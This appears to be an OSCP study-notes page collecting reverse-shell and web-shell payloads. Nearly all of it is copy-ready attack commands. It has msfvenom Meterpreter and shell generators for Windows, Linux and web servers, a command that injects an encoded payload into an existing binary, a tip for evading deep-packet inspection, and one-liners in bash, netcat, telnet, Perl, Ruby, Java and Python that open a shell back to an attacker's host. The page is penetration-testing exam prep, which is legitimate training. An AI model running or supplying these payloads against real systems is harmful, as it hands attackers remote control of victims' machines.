OSCP
Search…
Shells

Reverse-shells

This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/

Windows

Meterpreter
Standard meterpreter
1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse.exe
Copied!
1
use exploit/multi/handler
2
set payload windows/meterpreter/reverse_tcp
Copied!
Meterpreter HTTPS
It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.
1
msfvenom -p windows/meterpreter/reverse_https LHOST=ip LPORT=443 -f exe -o met_https_reverse.exe
Copied!
Non-staged payload
1
msfvenom -p windows/shell_reverse_tcp LHOST=ip LPORT=445 -f exe -o shell_reverse_tcp.exe
Copied!
1
use exploit/multi/handler
2
set payload windows/shell_reverse_tcp
Copied!
Staged payloadi
1
This must be caught with metasploit. It does not work with netcat.
Copied!
1
use exploit/multi/handler
2
set payload windows/shell/reverse_tcp
Copied!

Inject payload into binary

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=445 -f exe -e x86/shikata_ga_nai -i 9 -x "/somebinary.exe" -o bad_binary.exe
Copied!

Linux

Binary

1
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f elf > shell.elf
Copied!

Bash

1
0<&196;exec 196<>/dev/tcp/ip/80; sh <&196 >&196 2>&196
Copied!
1
bash -i >& /dev/tcp/ip/8080 0>&1
Copied!

Php

1
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
Copied!

Netcat

Bind shell
1
#Linux
2
nc -vlp 5555 -e /bin/bash
3
nc ip 5555
4
5
# Windows
6
nc.exe -nlvp 4444 -e cmd.exe
Copied!

Reverse shell

1
# Linux
2
nc -lvp 5555
3
nc ip 5555 -e /bin/bash
4
5
# Windows
6
nc -lvp 443
7
nc.exe ip 443 -e cmd.exe
Copied!

With -e flag

1
nc -e /bin/sh ATTACKING-IP 80
Copied!
1
/bin/sh | nc ATTACKING-IP 80
Copied!
Without -e flag
1
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Copied!

Ncat

Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.
Bind
1
ncat --exec cmd.exe --allow 192.168.1.101 -vnl 5555 --ssl
2
ncat -v ip 5555 --ssl
Copied!

Telnet

1
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
Copied!
1
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Copied!

Perl

1
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Copied!

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Copied!

Java

1
r = Runtime.getRuntime()
2
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3
p.waitFor()
Copied!

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Copied!

Web-shells

PHP

This php-shell is OS-independent. You can use it on both Linux and Windows.
1
msfvenom -p php/meterpreter_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.php
Copied!

ASP

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=443 -f asp > shell.asp
Copied!

WAR

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f war > shell.war
Copied!

JSP

1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ip LPORT=443 -f raw > shell.jsp
Copied!
Last modified 1yr ago